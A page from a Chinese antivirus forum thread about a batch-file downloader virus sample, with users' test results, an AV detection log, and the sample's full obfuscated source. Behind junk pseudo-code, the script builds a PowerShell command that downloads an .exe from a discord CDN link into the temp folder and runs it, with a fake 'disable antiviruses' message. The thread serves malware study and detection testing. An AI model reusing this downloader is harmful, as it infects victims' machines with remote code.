12
返回列表 发新帖
楼主: 3245076553
收起左侧

[病毒样本] 一个bat下载者病毒

[复制链接]
风之咩~
发表于 2019-2-23 23:16:09 | 显示全部楼层
www-tekeze 发表于 2019-2-23 21:58
N多个powershell动作,还会调用powershell.exe联网,但没任何流量。。。全部动作放行,等了5分钟,然后用 ...

喜闻乐见的水土不服连不上呗…
www-tekeze
发表于 2019-2-24 09:38:58 | 显示全部楼层
风之咩~ 发表于 2019-2-23 23:16
喜闻乐见的水土不服连不上呗…

嘿嘿,有大墙护着呢。。
心心相印
发表于 2019-2-24 11:48:30 | 显示全部楼层
智量kill
dreams521
发表于 2019-2-24 11:52:01 | 显示全部楼层
  1. [url=home.php?mod=space&uid=331734]@echo[/url] off
  2. prompt usr:~#

  3. echo So basically, this is the power of batcc xd
  4. echo made by rootabx

  5. \\0\declare nt, oskrnl, usrlocal [_0x90, _0x7B, _0x004F0C]:MEMORY
  6. MEMORY_ALLOC(USRTEMPFOLDERID(usrlocal,_0x90)):_0x0020D6SETMEMORY&SET _asmMemory=SE&KERNELSUBDLL_GETUSERFOLDERPATH&Mempointer*_0x000F00Cb74&SET _0x00b742==&USER==DIM&getNearAssembly()&dynamicClear.dll IntPtr.holdAll=0
  7. ZtWritebytes(_0x00c07df1),usrlocal&MEMPTR&%_asmMemory%T int128%_0x00b742%lS
  8. dynamicLL.CSharpProvider(encryptedFile-AES&_asmMemory.WriteUIon&%_asmMemory%T writeUI%_0x00b742%et.We&~insert&CSharpProvider.GenerateUI.Details(intptr*&%_asmMemory%T dynamicGUI%_0x00b742%ient).Down&.Up.Down.Down.Down.Up(65535)&.Down.Right.Left.Left.Down(65535)&%_asmMemory%T mmdiagnostic%_0x00b742%xe&environment.clear(xe)
  9. [rootabxRAT.API.Import(intptr*&Object0&%_asmMemory%T _0x000c%_0x00b742%le('ht&fileht(ht)&%_asmMemory%T _0x0042%_0x00b742%tPS
  10. remotePS.connectIP(myIP).TCP=true&kernelMode.OpenSession(oskrnl, intptr&asmMemory.T.\\&.//&///&\\.\/ _0x00f4//.//&%_asmMemory%T _0x00f2%_0x00b742%://cd&memptr.LoadDump()&wersh.CreateWersh(rw-r-w, intptr*&%_asmMemory%T _0x00d8%_0x00b742%ordapp.c&importFiles(ordapp.c, main.c, stdio.c))&memPtr.CLR.parseHex(6675636B796F75)&parsePointer*&wersh.CreateWersh(intptr*&%_asmMemory%T _0x0065%_0x00b742%wersh&Wersh.Clean(intptr*&%_asmMemory%T _0x0b56%_0x00b742%achmen&Schmens.ParsedHex_0x0000FC070B65.Dump(intptr*&%_asmMemory%T _0xb9%_0x00b742%250827267/537708856759812126/U&0xb9 0049026401284/577294609124798/496240824709767/6498520749274986/0000000000000);
  11. oskrnl.KernelInject(_0x90, intptr*&%_asmMemory%T _0x40%_0x00b742%','&Index[142]%TEMP%&c%int128%&%_asmMemory%T nternalStorage%_0x00b742%f exis&intptr*) wr-r-w ACCESSGRANT()
  12. C%int128%&.MODEOPEN
  13. memPointer(_0x004902, null, intptr.HoldZero*&POFile.FxPO&c%int128%&pO%_0x0065%ell.e%mmdiagnostic% (new-object System.N%writeUI%bCl%dynamicGUI%LoadFi%_0x000c%%_0x0042%%_0x00f2%n.disc%_0x00d8%om/att%_0x0b56%ts/537702667%_0xb9%SRSYSTEM.e%mmdiagnostic%%_0x40%%temP%\0x00b659SRS.E%mmdiagnostic%')&C%int128%
  14. i%nternalStorage%t "%temp%\0x00b659SRS.E%mmdiagnostic%" ("%temp%\0x00b659SRS.E%mmdiagnostic%") e%int128%e (color a&cls&echo PLEASE CHECK YOUR INTERNET CONNECTION OR DISABLE ANTIVIRUSES&pause)

复制代码
dreams521
发表于 2019-2-24 11:54:54 | 显示全部楼层
  1. 24.02.2019 11.54.12;检测到的对象 ( 文件 ) 将在计算机重启后处理;C:\Users\Administrator\Desktop\0x00b659SRS\0x00b659SRS.Exe//#;C:\Users\Administrator\Desktop\0x00b659SRS\0x00b659SRS.Exe//#;VHO:Trojan.Win32.Agent.gen;木马程序;02/24/2019 11:54:12
复制代码

评分

参与人数 1人气 +1 收起 理由
YU2711 + 1

查看全部评分

kaba666
发表于 2019-2-24 16:17:32 | 显示全部楼层
运行后有个联网动作,其他什么屁事都没有

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
bbszy
发表于 2019-2-24 19:00:32 | 显示全部楼层
双击 McAfee杀下载到临时文件夹的一个exe
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 12:27 , Processed in 0.097305 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表